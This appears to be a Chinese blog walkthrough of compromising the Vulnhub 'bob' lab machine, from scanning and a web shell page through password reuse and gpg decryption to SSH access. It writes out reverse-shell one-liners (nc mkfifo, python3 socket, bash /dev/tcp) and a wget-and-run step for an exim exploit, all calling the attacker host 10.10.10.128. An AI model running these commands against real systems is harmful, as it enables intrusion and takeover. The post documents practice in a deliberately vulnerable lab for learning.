Vulnhub靶机bob

主机发现

image-20250212121725111

访问第三个ip

image-20250212121631235

端口扫描发现ssh端口放到25468了,先记着

image-20250212121740426

利用dirb进行目录扫描

image-20250212122010616

查看robots.txt爬虫协议

image-20250212122003396

给了我们一封信,这是第一个html文件

image-20250212122452071

第二个

image-20250212122130455

dev_shell.php

image-20250212122556054

fantanshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f

image-20250212133609055

测试python3

image-20250212134936066

python3反弹shell也不行

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 

image-20250212135153681

对其进行url编码(也不行)

image-20250212135244131

用bash试了试,没有任何回显

/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1

image-20250212135521464

那么进行嵌套试试,这样就反弹成功了

bash -c '/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'

image-20250212140526557

创建交互式终端

python3 -c 'import pty; pty.spawn("/bin/bash")';

在查找suid文件的时候,意外发现了一个exim

find / -perm -4000 -print 2>/dev/null

看看他的版本信息,是4.89

image-20250212183452900

漏洞检索出来一个 46996

image-20250212184457280

将其复制到当前目录,并开启一个交互式终端

image-20250212184555161

靶机

cd /tmp
wget 10.10.10.128:5000/46996.sh
chmod +x 46996.sh
./46996.sh

失败了,切换思路

image-20250212184912511

这里有两个密码信息,Qwerty / theadminisdumb

image-20250212200009135

经过测试后,这两个密码分别对应着 jc / elliot,这两个用户,有了密码,并且发现他们都能使用sudo

image-20250212200433587

在这个bob用户的文档发现了一个gpg加密的文件,我们从靶机下载下来

image-20250212202812445

python3 -m http.server

我们使用kali的gpg工具解密

.gpg 文件是使用 GPG(GNU Privacy Guard) 加密工具生成的文件格式,通常用于保护文件内容的机密性。这类文件需要通过 GPG 私钥和密码才能解密。

gpg login.txt.gpg

需要我们输入密码

image-20250212202514159

我们找找密码

image-20250212202734732

继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?+

+image-20250212232256284

解密成功,得到了bob用户的密码为b0bcat_

ssh bob@10.10.10.204 -p 25468

image-20250212232714715

至此提权结束

往期推荐

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

Linux 32位Crossfire游戏缓冲区溢出

独立开发零显卡AI引擎!媲美DeepSeek,附源码

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

神器分享 红队快速打点工具-DarKnuclei

从零开始学SQL注入(sql十大注入类型):技术解析与实战演练

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【渗透测试】12种rbash逃逸方式总结

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容